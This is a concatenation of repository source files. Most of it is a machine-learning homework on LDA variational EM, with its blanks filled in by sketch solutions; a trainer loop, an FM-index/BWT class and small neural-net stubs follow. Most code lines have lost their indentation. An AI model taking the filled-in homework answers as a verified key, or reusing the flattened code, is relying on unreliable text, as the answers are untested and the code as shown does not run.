* Qt: the target Q values (estimated by Bellman Optimality Equation with the target Q network) for a mini-batch of samples, a pytorch vector of length (n). Qt[i] represents the target Q value for the i-th sample in the mini-batch.
* q: the Q values estimated by the Q-network on all actions for the current step of the game, a torch vector of length c. q[i] represents the estimated Q value for the i-th action.
* a: the index of the action being chosen by the player at the current step, an integer scalar between 0 and c-1.
* gamma: the discount factor, a float scalar between 0 and 1.
    * e: (epsilon) the probability that the player follows the random policy in the epsilon-greedy method. e is a float scalar between 0 and 1. At each time step, the player follows the greedy policy on the Q values with probability 1-e.
* S: the current states for a mini-batch of sampled game steps, a torch tensor of shape (n,p), where S[i] is the current game state in the i-th sample in the mini-batch.
* S_new: the new/next game states for a mini-batch of sampled games steps after state transition, a torch tensor of shape (n,p). S_new[i] is the next/new game state in the i-th sample of the mini-batch.
* R: a mini-batch of the immediate rewards returned after the transition, a float vector of length (n). R[i] is the received immediate reward of the i-th sampled game step in the mini-batch.
* A: a mini-batch of the actions chosen by the player, an integer vector of length (n).
* T: whether or not the new/next game state is a terminal state in a mini-batch of sampled games steps, a boolean torch tensor of length n. T[i]= True if S_new[i] is a terminal state in the game (where the game ends).
* s: the current state of the game, a torch vector of length p.
'''
#--------------------------------------------
```
#### File: CS-539-Machine-Learning/homework5/problem3.py
```python
import numpy as np
import problem2 as p2
from scipy.special import psi,polygamma
from scipy.linalg import inv
# Note: please don't import any new package. You should solve this problem using only the package(s) above.
#-------------------------------------------------------------------------
'''
Problem 3: LDA (Latent Dirichlet Allocation) using Variational EM method (40 points)
In this problem, we will implement the Latent Dirichlet Allocation (variational EM solution) to model text documents
A list of all variables being used in this problem is provided at the end of this file.
'''
#----------------------------------------------------
'''
    Let's start by building some utility functions. Compute the digamma function, which is the derivative of the log Gamma function. If the input (x) is a scalar value, the output (dx) is the digamma value of x; if the input (x) is a vector, the output (dx) is a vector where each element is the digamma value of the corresponding element of x.
---- Inputs: --------
* x_g: the input to the digamma function, a float scalar or a numpy vector.
---- Outputs: --------
* dx_g: the output of the digamma function, a float scalar or a numpy vector.
---- Hints: --------
* You could use a function in scipy package to compute digamma function.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_digamma(x_g):
#########################################
## INSERT YOUR CODE HERE (4 points)
dx_g = psi(x_g)
#########################################
return dx_g
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_digamma
--- OR ----
python3 -m nose -v test3.py:test_compute_digamma
--- OR ----
python -m nose -v test3.py:test_compute_digamma
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Update Phi with 1 word in 1 document) Given a word ID (w) in a document (d), the current model parameters (Beta) and the variational parameters (gamma_d) in the document (d), update the variational parameter phi_w for the word (w) in the text document (d).
---- Inputs: --------
* w: the ID of a word in the vocabulary, an integer scalar, which can be 0,1, ..., or v-1.
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
* gamma_d: the variational parameter (Gamma) for a Dirichlet distribution to generate the topic-mixtures (Theta) in one document (d), a numpy float vector of length c. Gamma[i] represent the parameter of the Dirichlet distribution on the i-th topic when generating the topic mixture for the document.
---- Outputs: --------
* phi_w: the variational parameter (phi) of a categorical distribution to generate the topic (z) of a word (w) in a document, a numpy float vector of length c. phi_w[i] represents the probability of generating the i-th topic for word (w) in the document.
---- Hints: --------
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def compute_phi_w(w, Beta, gamma_d):
#########################################
## INSERT YOUR CODE HERE (4 points)
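    # A possible sketch (assumption: the standard mean-field update for LDA):
    # phi_w[i] is proportional to Beta[i, w] * exp(digamma(gamma_d[i])),
    # normalized so that the topic probabilities sum to one.
    phi_w = Beta[:, w] * np.exp(compute_digamma(gamma_d))
    phi_w = phi_w / phi_w.sum()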
#########################################
return phi_w
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_phi_w
--- OR ----
python3 -m nose -v test3.py:test_compute_phi_w
--- OR ----
python -m nose -v test3.py:test_compute_phi_w
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Update Phi with all the words in 1 document) Given the current model parameters (Beta) and the variational parameters (gamma_d) on a document (d), update the variational parameter Phi in the document (d).
---- Inputs: --------
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
* gamma_d: the variational parameter (Gamma) for a Dirichlet distribution to generate the topic-mixtures (Theta) in one document (d), a numpy float vector of length c. Gamma[i] represent the parameter of the Dirichlet distribution on the i-th topic when generating the topic mixture for the document.
---- Outputs: --------
* phi_d: the variational parameters (phi) of a list of categorical distributions to generate the topic (z) in one document, a numpy float matrix of shape m by c. Each row represents the parameters of a categorical distribution to generate different topics in one word in the document; phi_d[i,j] represents the probability of generating the j-th topic for the i-th word.
---- Hints: --------
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def compute_phi_d(Beta, gamma_d):
#########################################
## INSERT YOUR CODE HERE (4 points)
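    # A possible sketch: apply the phi_w update to every word ID at once.
    # Rows of phi_d are indexed by word ID, columns by topic.
    phi_d = Beta.T * np.exp(compute_digamma(gamma_d))
    phi_d = phi_d / phi_d.sum(axis=1, keepdims=True)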
#########################################
return phi_d
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_phi_d
--- OR ----
python3 -m nose -v test3.py:test_compute_phi_d
--- OR ----
python -m nose -v test3.py:test_compute_phi_d
---------------------------------------------------
'''
#----------------------------------------------------
'''
(E-Step: Update Phi on all words in all documents) Given the current model parameters (Beta) and the variational parameters (Gamma) in all the documents, update the variational parameters Phi in all documents.
---- Inputs: --------
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
* Gamma: the variational parameters (Gamma) for multiple Dirichlet distributions to generate the topic-mixtures (Theta) in all documents, a numpy float matrix of shape n by c. Gamma[i] represent the parameter of a Dirichlet distribution to generate the topic-mixture in the i-th document.
---- Outputs: --------
* Phi: the variational parameters (Phi) of categorical distributions (one distribution on each word of each document) to generate the topics (z) in all words of all document, a numpy float tensor of shape n by m by c. Phi[i] represents the phi values on the i-th text document; Phi[i,j,k] = P(T=k | W_j,D=i) represents the probability of generating the k-th topic for the j-th word in the i-th text document.
---- Hints: --------
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_Phi(Beta, Gamma):
#########################################
## INSERT YOUR CODE HERE (4 points)
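    # A possible one-line sketch: stack the per-document phi matrices.
    Phi = np.array([compute_phi_d(Beta, gamma_d) for gamma_d in Gamma])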
#########################################
return Phi
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_Phi
--- OR ----
python3 -m nose -v test3.py:test_compute_Phi
--- OR ----
python -m nose -v test3.py:test_compute_Phi
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Update Gamma in 1 document) Given the variational parameters (phi_d) on a text document, update the variational parameter gamma_d on the document.
---- Inputs: --------
* phi_d: the variational parameters (phi) of a list of categorical distributions to generate the topic (z) in one document, a numpy float matrix of shape m by c. Each row represents the parameters of a categorical distribution to generate different topics in one word in the document; phi_d[i,j] represents the probability of generating the j-th topic for the i-th word.
* C_d: word frequency counts in a text document, an integer numpy vector of length v; C[i] represents how many times the i-th word in the vocabulary has been used in the document.
* Alpha: the parameters of the prior probability distribution (a Dirichlet distribution) for generating topic-mixture for each document, a float vector of length c.
---- Outputs: --------
* gamma_d: the variational parameter (Gamma) for a Dirichlet distribution to generate the topic-mixtures (Theta) in one document (d), a numpy float vector of length c. Gamma[i] represent the parameter of the Dirichlet distribution on the i-th topic when generating the topic mixture for the document.
---- Hints: --------
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_gamma_d(phi_d, C_d, Alpha):
#########################################
## INSERT YOUR CODE HERE (4 points)
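    # A possible sketch: gamma_d = Alpha + sum over word IDs of
    # (count of the word in the document) * (topic probabilities for that word).
    gamma_d = Alpha + C_d @ phi_d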
#########################################
return gamma_d
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_gamma_d
--- OR ----
python3 -m nose -v test3.py:test_compute_gamma_d
--- OR ----
python -m nose -v test3.py:test_compute_gamma_d
---------------------------------------------------
'''
#----------------------------------------------------
'''
(E-step: Update Gamma in all documents) Given the variational parameters (Phi) on all text documents, update the variational parameters Gamma on all documents.
---- Inputs: --------
* Phi: the variational parameters (Phi) of categorical distributions (one distribution on each word of each document) to generate the topics (z) in all words of all document, a numpy float tensor of shape n by m by c. Phi[i] represents the phi values on the i-th text document; Phi[i,j,k] = P(T=k | W_j,D=i) represents the probability of generating the k-th topic for the j-th word in the i-th text document.
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
* Alpha: the parameters of the prior probability distribution (a Dirichlet distribution) for generating topic-mixture for each document, a float vector of length c.
---- Outputs: --------
* Gamma: the variational parameters (Gamma) for multiple Dirichlet distributions to generate the topic-mixtures (Theta) in all documents, a numpy float matrix of shape n by c. Gamma[i] represent the parameter of a Dirichlet distribution to generate the topic-mixture in the i-th document.
---- Hints: --------
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_Gamma(Phi, C, Alpha):
#########################################
## INSERT YOUR CODE HERE (4 points)
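    # A possible sketch: apply the per-document gamma update to each document.
    Gamma = np.array([compute_gamma_d(phi_d, C_d, Alpha) for phi_d, C_d in zip(Phi, C)])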
#########################################
return Gamma
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_Gamma
--- OR ----
python3 -m nose -v test3.py:test_compute_Gamma
--- OR ----
python -m nose -v test3.py:test_compute_Gamma
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Expectation Step of EM algorithm) Given the current model parameters (Alpha and Beta), compute the optimal values for variational parameters (Phi and Gamma).
---- Inputs: --------
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
* Alpha: the parameters of the prior probability distribution (a Dirichlet distribution) for generating topic-mixture for each document, a float vector of length c.
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
* n_iter_var: the number of iterations for iteratively updating Phi and Gamma during variational inference.
---- Outputs: --------
* Phi: the variational parameters (Phi) of categorical distributions (one distribution on each word of each document) to generate the topics (z) in all words of all document, a numpy float tensor of shape n by m by c. Phi[i] represents the phi values on the i-th text document; Phi[i,j,k] = P(T=k | W_j,D=i) represents the probability of generating the k-th topic for the j-th word in the i-th text document.
* Gamma: the variational parameters (Gamma) for multiple Dirichlet distributions to generate the topic-mixtures (Theta) in all documents, a numpy float matrix of shape n by c. Gamma[i] represent the parameter of a Dirichlet distribution to generate the topic-mixture in the i-th document.
---- Hints: --------
* (Step 1) update Phi with Gamma.
* (Step 2) update Gamma with Phi.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def E_step(C, Alpha, Beta, n_iter_var=20):
n = C.shape[0] # n documents
c, v = Beta.shape # c topics, v words in the vocabulary
#initialize variational parameters
Gamma = np.ones((n,c))*Alpha
for _ in range(n_iter_var): #repeat multiple passes
pass #no operation (you can ignore this line)
#########################################
## INSERT YOUR CODE HERE (4 points)
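        # A possible sketch: alternate the two coordinate-ascent updates.
        Phi = compute_Phi(Beta, Gamma)
        Gamma = compute_Gamma(Phi, C, Alpha)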
#########################################
return Phi, Gamma
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_E_step
--- OR ----
python3 -m nose -v test3.py:test_E_step
--- OR ----
python -m nose -v test3.py:test_E_step
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Update Parameter Beta on the t-th topic) Given a collection of text documents, represented as word-frequency format (C), and inferred topic distributions (Phi), please compute the maximum likelihood solution of the parameter Beta on the t-th topic: the word distribution of the t-th topic, i.e., the conditional probabilities of P(W|T=t).
---- Inputs: --------
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
    * phi_t: the variational parameters (phi) of a list of categorical distributions to generate the t-th topic in all words of all documents, a numpy float matrix of shape n by v. phi_t[i,j] represents the probability of generating the t-th topic for the word ID=j in the i-th document.
---- Outputs: --------
* beta_t: the word probability distribution for one topic (t), a float numpy vector of length v; beta_t[i] represents the probability P(W=i | T =t), which is the conditional probability of generating the i-th word in the vocabulary in the topic (t).
---- Hints: --------
* You could use some function in the previous problem to solve this question.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_beta_t(C, phi_t):
#########################################
## INSERT YOUR CODE HERE (4 points)
beta_t = p2.compute_beta_t(C, phi_t)
#########################################
return beta_t
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_beta_t
--- OR ----
python3 -m nose -v test3.py:test_compute_beta_t
--- OR ----
python -m nose -v test3.py:test_compute_beta_t
---------------------------------------------------
'''
#----------------------------------------------------
'''
(M-step: Computing word distribution of each topic) Given a collection of text documents, represented as word-frequency format (C), and inferred topic distributions (Phi), please compute the maximum likelihood solution of the parameter Beta: the word distribution of each topic, i.e., the conditional probabilities of P(W|T).
---- Inputs: --------
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
* Phi: the variational parameters (Phi) of categorical distributions (one distribution on each word of each document) to generate the topics (z) in all words of all document, a numpy float tensor of shape n by m by c. Phi[i] represents the phi values on the i-th text document; Phi[i,j,k] = P(T=k | W_j,D=i) represents the probability of generating the k-th topic for the j-th word in the i-th text document.
---- Outputs: --------
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
---- Hints: --------
* You could use some function in the previous problem to solve this question.
* This problem can be solved using 1 line(s) of code.
'''
#---------------------
def compute_Beta(C, Phi):
#########################################
## INSERT YOUR CODE HERE (4 points)
Beta = p2.compute_Beta(C, Phi)
#########################################
return Beta
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_compute_Beta
--- OR ----
python3 -m nose -v test3.py:test_compute_Beta
--- OR ----
python -m nose -v test3.py:test_compute_Beta
---------------------------------------------------
'''
#----------------------------------------------------
'''
(Variational EM method for LDA Model) Given the word counts of a set of documents, optimize the model parameters (Beta) using Variational EM.
---- Inputs: --------
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
* Alpha: the parameters of the prior probability distribution (a Dirichlet distribution) for generating topic-mixture for each document, a float vector of length c.
* n_iter_var: the number of iterations for iteratively updating Phi and Gamma during variational inference.
* n_iter_EM: the number of iterations for EM algorithm.
---- Outputs: --------
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
---- Hints: --------
* Step 1 (E step): Compute Phi and Gamma based upon the current values of Alpha and Beta.
* Step 2 (M step): update the parameter Beta based upon the new values of Phi and Gamma.
* This problem can be solved using 2 line(s) of code.
'''
#---------------------
def LDA(C, Alpha, n_iter_var=20, n_iter_EM=10):
c = len(Alpha)
v = C.shape[1]
Beta = np.random.rand(c,v) # initialize Beta
Beta = Beta/Beta.sum(1,keepdims=True)
for _ in range(n_iter_EM): # repeat multiple iterations of E and M steps
pass # you could ignore this line
#########################################
## INSERT YOUR CODE HERE (4 points)
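        # A possible sketch: E step (infer Phi and Gamma), then M step (re-estimate Beta).
        Phi, Gamma = E_step(C, Alpha, Beta, n_iter_var)
        Beta = compute_Beta(C, Phi)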
#########################################
return Beta
#-----------------
'''
TEST: Now you can test the correctness of your code above by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py:test_LDA
--- OR ----
python3 -m nose -v test3.py:test_LDA
--- OR ----
python -m nose -v test3.py:test_LDA
---------------------------------------------------
'''
#--------------------------------------------
'''
TEST problem 3:
Now you can test the correctness of all the above functions by typing the following in the terminal:
---------------------------------------------------
nosetests -v test3.py
--- OR ----
python3 -m nose -v test3.py
--- OR ----
python -m nose -v test3.py
---------------------------------------------------
If your code passed all the tests, you will see the following message in the terminal:
----------- Problem 3 (40 points in total)--------------------- ... ok
* (4 points) compute_digamma ... ok
* (4 points) compute_phi_w ... ok
* (4 points) compute_phi_d ... ok
* (4 points) compute_Phi ... ok
* (4 points) compute_gamma_d ... ok
* (4 points) compute_Gamma ... ok
* (4 points) E_step ... ok
* (4 points) compute_beta_t ... ok
* (4 points) compute_Beta ... ok
* (4 points) LDA ... ok
----------------------------------------------------------------------
Ran 10 tests in 0.586s
OK
'''
#--------------------------------------------
#--------------------------------------------
'''
List of All Variables
* n: the number of text documents in the dataset, an integer scalar.
* v: the number of possible words in the vocabulary, an integer scalar.
* c: the number of possible topics (categories) in the model, an integer scalar.
* x_g: the input to the digamma function, a float scalar or a numpy vector.
* dx_g: the output of the digamma function, a float scalar or a numpy vector.
* w: the ID of a word in the vocabulary, an integer scalar, which can be 0,1, ..., or v-1.
* C_d: word frequency counts in a text document, an integer numpy vector of length v; C[i] represents how many times the i-th word in the vocabulary has been used in the document.
* C: word frequency counts in the text documents, an integer numpy matrix of shape (n, v); C[i,j] represents how many times the j-th word in the vocabulary has been used in the i-th document.
* Alpha: the parameters of the prior probability distribution (a Dirichlet distribution) for generating topic-mixture for each document, a float vector of length c.
* beta_t: the word probability distribution for one topic (t), a float numpy vector of length v; beta_t[i] represents the probability P(W=i | T =t), which is the conditional probability of generating the i-th word in the vocabulary in the topic (t).
* Beta: the parameters for word distribution on c topics, a numpy float matrix of shape c by v. Beta[i,j] represents the probability of generating the j-th word (ID=j) in the i-th topic.
* phi_w: the variational parameter (phi) of a categorical distribution to generate the topic (z) of a word (w) in a document, a numpy float vector of length c. phi_w[i] represents the probability of generating the i-th topic for word (w) in the document.
* phi_d: the variational parameters (phi) of a list of categorical distributions to generate the topic (z) in one document, a numpy float matrix of shape m by c. Each row represents the parameters of a categorical distribution to generate different topics in one word in the document; phi_d[i,j] represents the probability of generating the j-th topic for the i-th word.
    * phi_t: the variational parameters (phi) of a list of categorical distributions to generate the t-th topic in all words of all documents, a numpy float matrix of shape n by v. phi_t[i,j] represents the probability of generating the t-th topic for the word ID=j in the i-th document.
* Phi: the variational parameters (Phi) of categorical distributions (one distribution on each word of each document) to generate the topics (z) in all words of all document, a numpy float tensor of shape n by m by c. Phi[i] represents the phi values on the i-th text document; Phi[i,j,k] = P(T=k | W_j,D=i) represents the probability of generating the k-th topic for the j-th word in the i-th text document.
* gamma_d: the variational parameter (Gamma) for a Dirichlet distribution to generate the topic-mixtures (Theta) in one document (d), a numpy float vector of length c. Gamma[i] represent the parameter of the Dirichlet distribution on the i-th topic when generating the topic mixture for the document.
* Gamma: the variational parameters (Gamma) for multiple Dirichlet distributions to generate the topic-mixtures (Theta) in all documents, a numpy float matrix of shape n by c. Gamma[i] represent the parameter of a Dirichlet distribution to generate the topic-mixture in the i-th document.
* n_iter_var: the number of iterations for iteratively updating Phi and Gamma during variational inference.
* n_iter_EM: the number of iterations for EM algorithm.
'''
#--------------------------------------------
``` |
{
"source": "jojonki/AttentionNetworks-for-QA",
"score": 3
} |
#### File: jojonki/AttentionNetworks-for-QA/config.py
```python
class Config(object):
def __init__(self, **entries):
self.__dict__.update(entries)
``` |
{
"source": "jojonki/BabyNet",
"score": 3
} |
#### File: BabyNet/common/trainer.py
```python
import matplotlib.pyplot as plt
import numpy as np
import time
class Trainer:
def __init__(self, model, optimizer):
self.model = model
self.optimizer = optimizer
self.loss_list = []
self.eval_interval = None
self.current_epoch = 0
def fit(self, x, t, max_epoch=10, batch_size=32, max_grad=None, eval_interval=20):
data_size = len(x)
max_iters = data_size // batch_size
self.eval_interval = eval_interval
model, optimizer = self.model, self.optimizer
total_loss = 0
loss_count = 0
start_time = time.time()
for epoch in range(max_epoch):
idx = np.random.permutation(np.arange(data_size))
x = x[idx]
t = t[idx]
for iters in range(max_iters):
batch_x = x[iters*batch_size:(iters+1)*batch_size]
batch_t = t[iters*batch_size:(iters+1)*batch_size]
loss = model.forward(batch_x, batch_t)
model.backward()
params, grads = model.params, model.grads
# TODO clip max_grad if it's specified
optimizer.update(params, grads)
total_loss += loss
loss_count += 1
if (eval_interval is not None) and (iters % eval_interval) == 0:
avg_loss = total_loss / loss_count
elapsed_time = time.time() - start_time
print('| epoch %d | iter %d / %d | time %d[s] | loss %.2f'
% (self.current_epoch + 1, iters + 1, max_iters, elapsed_time, avg_loss))
self.loss_list.append(float(avg_loss))
total_loss, loss_count = 0, 0
def plot(self, ylim=None):
x = np.arange(len(self.loss_list))
if ylim is not None:
plt.ylim(*ylim)
plt.plot(x, self.loss_list, label='train')
plt.xlabel('iterations (x' + str(self.eval_interval) + ')')
plt.ylabel('loss')
plt.show()
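
# A minimal, self-contained usage sketch (not part of the original repo).
# Trainer only assumes that the model exposes forward(x, t), backward(),
# params and grads, and that the optimizer exposes update(params, grads);
# the toy classes below are illustrative stand-ins, not real project code.
class _ToyLinearModel:
    """Toy model y = x @ W trained with a mean-squared-error loss."""
    def __init__(self, in_size, out_size):
        self.params = [np.random.randn(in_size, out_size) * 0.1]
        self.grads = [np.zeros((in_size, out_size))]

    def forward(self, x, t):
        self._x, self._diff = x, x.dot(self.params[0]) - t
        return float((self._diff ** 2).mean())

    def backward(self):
        self.grads[0][...] = 2 * self._x.T.dot(self._diff) / len(self._x)

class _ToySGD:
    def __init__(self, lr=0.1):
        self.lr = lr

    def update(self, params, grads):
        for p, g in zip(params, grads):
            p -= self.lr * g  # in-place update keeps model.params in sync

if __name__ == '__main__':
    x = np.random.randn(320, 2)
    t = x.dot(np.array([[1.0], [-2.0]]))  # targets from a known linear map
    trainer = Trainer(_ToyLinearModel(2, 1), _ToySGD(lr=0.1))
    trainer.fit(x, t, max_epoch=5, batch_size=32, eval_interval=5)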
``` |
{
"source": "jojonki/BWT",
"score": 2
} |
#### File: jojonki/BWT/fm_index.py
```python
import sys
from tqdm import tqdm
from itertools import groupby
from operator import itemgetter
class FMIndex:
# ref https://www.cs.jhu.edu/~langmea/resources/lecture_notes/bwt_and_fm_index.pdf
def __init__(self):
self.marker = '$'
def encode(self, text):
self.text_len = len(text)
print('get sa...')
sa, _, _ = self.suffix_array(text)
self.sa = sa # TODO reduce memory footprint
print('get bwt...')
self.bwt = self.bwt_via_sa(text, sa)
return self.bwt, self.sa
def set_dict(self, data):
if 'bwt' in data:
self.bwt = data['bwt']
if 'sa' in data:
self.sa = data['sa']
if 'text_len' in data:
self.text_len = data['text_len']
if 'ch_count' in data:
self.ch_count = data['ch_count']
def decode(self, bwt):
ranks, ch_count = self.rank_bwt(bwt)
self.ch_count = ch_count
first = self.first_col(ch_count)
t = self.marker
row_i = 0
while bwt[row_i] != self.marker:
c = bwt[row_i]
t = c + t
row_i = first[c][0] + ranks[row_i]
assert (len(t) - 1) == self.text_len
if t[-1] == self.marker:
t = t[:-1]
return t
# def suffix_array(self, t):
# print('----1', len(t), ', size', sys.getsizeof(t))
#
#
# sfxes = [t[i:] for i in tqdm(range(len(t)))]
# print('----2')
# # The first value [len(t)] is for marker '$'
# # Force to set '$' to the 0th position
# return [len(t)] + [i[0] for i in sorted(enumerate(sfxes), key=lambda x:x[1])]
def longest_common_substring(self, text):
"""Get the longest common substrings and their positions.
>>> longest_common_substring('banana')
{'ana': [1, 3]}
>>> text = "not so Agamemnon, who spoke fiercely to "
>>> sorted(longest_common_substring(text).items())
[(' s', [3, 21]), ('no', [0, 13]), ('o ', [5, 20, 38])]
        This function can easily be modified for other criteria, e.g. for searching
        for the ten longest non-overlapping repeated substrings.
"""
sa, rsa, lcp = self.suffix_array(text)
maxlen = max(lcp)
result = {}
for i in range(1, len(text)):
if lcp[i] == maxlen:
j1, j2, h = sa[i - 1], sa[i], lcp[i]
assert text[j1:j1 + h] == text[j2:j2 + h]
substring = text[j1:j1 + h]
if not substring in result:
result[substring] = [j1]
result[substring].append(j2)
return dict((k, sorted(v)) for k, v in result.items())
def suffix_array(self, text, _step=16):
"""Analyze all common strings in the text.
        Short substrings of length _step are first pre-sorted. The results are then
        repeatedly merged so that the guaranteed number of compared characters is
        doubled in every iteration, until all substrings are sorted exactly.
Arguments:
text: The text to be analyzed.
_step: Is only for optimization and testing. It is the optimal length
of substrings used for initial pre-sorting. The bigger value is
faster if there is enough memory. Memory requirements are
approximately (estimate for 32 bit Python 3.3):
len(text) * (29 + (_size + 20 if _size > 2 else 0)) + 1MB
Return value: (tuple)
(sa, rsa, lcp)
sa: Suffix array for i in range(1, size):
assert text[sa[i-1]:] < text[sa[i]:]
rsa: Reverse suffix array for i in range(size):
assert rsa[sa[i]] == i
lcp: Longest common prefix for i in range(1, size):
assert text[sa[i-1]:sa[i-1]+lcp[i]] == text[sa[i]:sa[i]+lcp[i]]
if sa[i-1] + lcp[i] < len(text):
assert text[sa[i-1] + lcp[i]] < text[sa[i] + lcp[i]]
>>> suffix_array(text='banana')
([5, 3, 1, 0, 4, 2], [3, 2, 5, 1, 4, 0], [0, 1, 3, 0, 0, 2])
Explanation: 'a' < 'ana' < 'anana' < 'banana' < 'na' < 'nana'
The Longest Common String is 'ana': lcp[2] == 3 == len('ana')
It is between tx[sa[1]:] == 'ana' < 'anana' == tx[sa[2]:]
"""
tx = text
size = len(tx)
step = min(max(_step, 1), len(tx))
sa = list(range(len(tx)))
sa.sort(key=lambda i: tx[i:i + step])
grpstart = size * [False] + [True] # a boolean map for iteration speedup.
# It helps to skip yet resolved values. The last value True is a sentinel.
rsa = size * [None]
stgrp, igrp = '', 0
for i, pos in enumerate(sa):
st = tx[pos:pos + step]
if st != stgrp:
grpstart[igrp] = (igrp < i - 1)
stgrp = st
igrp = i
rsa[pos] = igrp
sa[i] = pos
grpstart[igrp] = (igrp < size - 1 or size == 0)
while grpstart.index(True) < size:
# assert step <= size
nextgr = grpstart.index(True)
while nextgr < size:
igrp = nextgr
nextgr = grpstart.index(True, igrp + 1)
glist = []
for ig in range(igrp, nextgr):
pos = sa[ig]
if rsa[pos] != igrp:
break
newgr = rsa[pos + step] if pos + step < size else -1
glist.append((newgr, pos))
glist.sort()
for ig, g in groupby(glist, key=itemgetter(0)):
g = [x[1] for x in g]
sa[igrp:igrp + len(g)] = g
grpstart[igrp] = (len(g) > 1)
for pos in g:
rsa[pos] = igrp
igrp += len(g)
step *= 2
del grpstart
# create LCP array
lcp = size * [None]
h = 0
for i in range(size):
if rsa[i] > 0:
j = sa[rsa[i] - 1]
while i != size - h and j != size - h and tx[i + h] == tx[j + h]:
h += 1
lcp[rsa[i]] = h
if h > 0:
h -= 1
if size > 0:
lcp[0] = 0
return sa, rsa, lcp
def bwt_via_sa(self, t, sa):
bwt = []
for si in sa:
if si == 0:
bwt += self.marker
else:
bwt += t[si - 1]
self.bwt = bwt
return self.bwt
def rank_bwt(self, bw):
ch_count = {}
ranks = []
for c in bw:
if c not in ch_count:
ch_count[c] = 0
ranks.append(ch_count[c])
ch_count[c] += 1
return ranks, ch_count
def first_col(self, ch_count):
# F must start from '$' marker
        F = {self.marker: (0, 1)}  # the '$' marker occupies row 0 of the first column
offset = 1
for c, count in sorted(ch_count.items()):
            if c != self.marker:  # Ignore '$' because we already added the marker to F
F[c] = (offset, offset + count)
offset += count
return F
def rank(self, c, k):
return self.bwt[:k].count(c)
def rank_lt(self, c):
# TODO impl better way
assert self.ch_count is not None
F = self.first_col(self.ch_count)
if c in F:
return F[c][0]
else:
return None
def search(self, pat):
assert self.bwt is not None
assert self.sa is not None
# F = self.first_col(self.ch_count)
# L = self.bwt
begin = 0
end = len(self.bwt)
for c in pat[::-1]:
offset = self.rank_lt(c)
if offset is None:
begin, end = None, None
break
begin = offset + self.rank(c, begin)
end = offset + self.rank(c, end)
if begin >= end: # no results
begin, end = None, None
break
# print('[bwt] (begin, end)', begin, end)
match = []
if begin is not None and end is not None:
for i in range(begin, end):
match.append((self.sa[i], self.sa[i] + len(pat)))
return match
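
# A small usage sketch (not part of the original file): build the index for a
# short text, decode it back, and search for a pattern. search() returns the
# (start, end) span of every occurrence of the pattern in the original text.
if __name__ == '__main__':
    fm = FMIndex()
    text = 'abracadabra'
    bwt, sa = fm.encode(text)
    print('decoded :', fm.decode(bwt))      # also fills in fm.ch_count
    print('matches :', fm.search('abra'))   # e.g. spans for positions 0 and 7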
``` |
{
"source": "jojonki/docker-dev",
"score": 3
} |
#### File: jojonki/docker-dev/activations.py
```python
import numpy as np
class Sigmoid:
def __init__(self):
self.params = []
def forward(self, x):
return 1 / (1 + np.exp(-x))
if __name__ == '__main__':
x = np.random.randn(10, 2)
W1 = np.random.randn(2, 4)
b1 = np.random.randn(4)
W2 = np.random.randn(4, 3)
b2 = np.random.randn(3)
h = np.dot(x, W1) + b1 # (10, 4)
    a = Sigmoid().forward(h)  # (10, 4)
s = np.dot(a, W2) + b2 # (10, 3)
print(s)
```
#### File: jojonki/docker-dev/two_layer_net.py
```python
import numpy as np
from affine import Affine
from activations import Sigmoid
class TwoLayerNet:
def __init__(self, in_size, h_size, o_size):
I, H, O = in_size, h_size, o_size
W1 = np.random.randn(I, H)
b1 = np.random.randn(H)
